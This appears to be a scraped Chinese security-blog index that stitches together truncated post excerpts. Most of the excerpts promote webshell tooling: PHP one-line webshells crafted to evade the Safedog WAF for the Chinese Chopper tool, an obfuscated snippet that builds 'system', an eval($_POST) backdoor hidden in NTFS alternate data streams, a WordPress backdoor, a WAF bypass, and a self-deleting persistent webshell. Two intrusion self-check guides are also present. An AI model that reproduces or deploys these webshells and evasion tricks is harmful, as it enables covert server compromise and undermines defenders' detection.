发一个过狗一句话

过狗一句话

中国菜刀专用过狗免杀PHP一句话

   中国菜刀专用过狗一句话

php过狗一句话

<?php
/*

isDog

*/
                // $a assert
        $a = "0,1,2,3,4,5,s,y,s,t,e,m";
        // 根据','转换成数组
        $array = explode(",",$a);
                // 空变量


快速自检电脑是否被黑客入侵过(Linux版)

之前写了一篇《快速自检电脑是否被黑客入侵过(Windows版)》, 这次就来写写Linux版本的。前言严谨地说, Linux只是一个内核, `GNU Linux`才算完整的操作系统, 但在本文里还是用通俗的叫法,把`Ubuntu`,`Debian`,`RedHat`,`CentOS`,`ArchLinux`等发行版都统称为`Linux`.本文里所说的方法不仅对Linux的发行版适用, 部分方法对`Mac OSX`操作系统也是适用的.异常的帐号和权限如果黑客曾经获得过命令运行的机会, 对方往往会想

快速自检电脑是否被黑客入侵过(Windows版)

我们经常会感觉电脑行为有点奇怪, 比如总是打开莫名其妙的网站, 或者偶尔变卡(网络/CPU), 似乎自己"中毒"了,但X60安全卫士或者X讯电脑管家扫描之后又说你电脑"非常安全", 那么有可能你已经被黑客光顾过了. 这种时候也许要专业的取证人员出场,但似乎又有点小提大作. 因此本文介绍一些低成本的自检方法, 对于个人用户可以快速判断自己是否已经被入侵过.1. 异常的日志记录通常我们需要检查一些可疑的事件记录, 比如:“Event log&nbsp

过狗过云锁一句话

thum-4a471512647354.jpg

权限后门系列之一:手动打造WordPress权限后门

screen 2017-12-23 at 16.19.57.jpg

利用ADS隐藏webshell

0X01 前言  未知攻,焉知防,在web端如何做手脚维护自己拿到的权限呢?首先要面临的是webshell查杀,那么通过利用ADS隐藏webshell,不失为一个好办法。0X02 利用ADS隐藏webshell  关于ADS的介绍,就不再阐述,详见尾部参考资料。  PHP 一句话木马:<?php @eval($_POST['chopper']);?>,当然也可以直接制作免杀PHP一句话,毕竟PHP千变万化,从变量,数组,赋值,运算,函数等,各种变种。。。 

waf bypass

工作原因对某站进行渗透,同样是工作原因我不能描述太细致,所以很怂的我只能靠语言文字来描述一下整个思路,再附上这次bypass的马遇到的防火墙是一个没怎么见过的种类,大致fuzz了一下,规则有:1. 检测内容,如果有<, >, _GET, _POST, _REQUEST, phpinfo()等函数直接ban掉2. 检测行为,如果对上传的页面以GET或POST方式传递数据,直接ban掉通过注入找到一个可用的用户以后(没管理),发现一个上传点。在试图上传php时发现,会对里面的内容进行检测

php不死马

在别人服务器上dump下了这个文件,分析了一下,是一个挺有意思的不死马,分析以后跟大家分享一下所以这算原创还是转载…毕竟不是我写的马 有啥不合适的我再改(这个不死马的主体是这个文件,不妨叫Trojan.php<?php @unlink($_SERVER['SCRIPT_FILENAME']); //删除自身 error_reporting(0); //禁用错误报告 ignore_user_abort(true); //忽略与用户的断开,用户浏览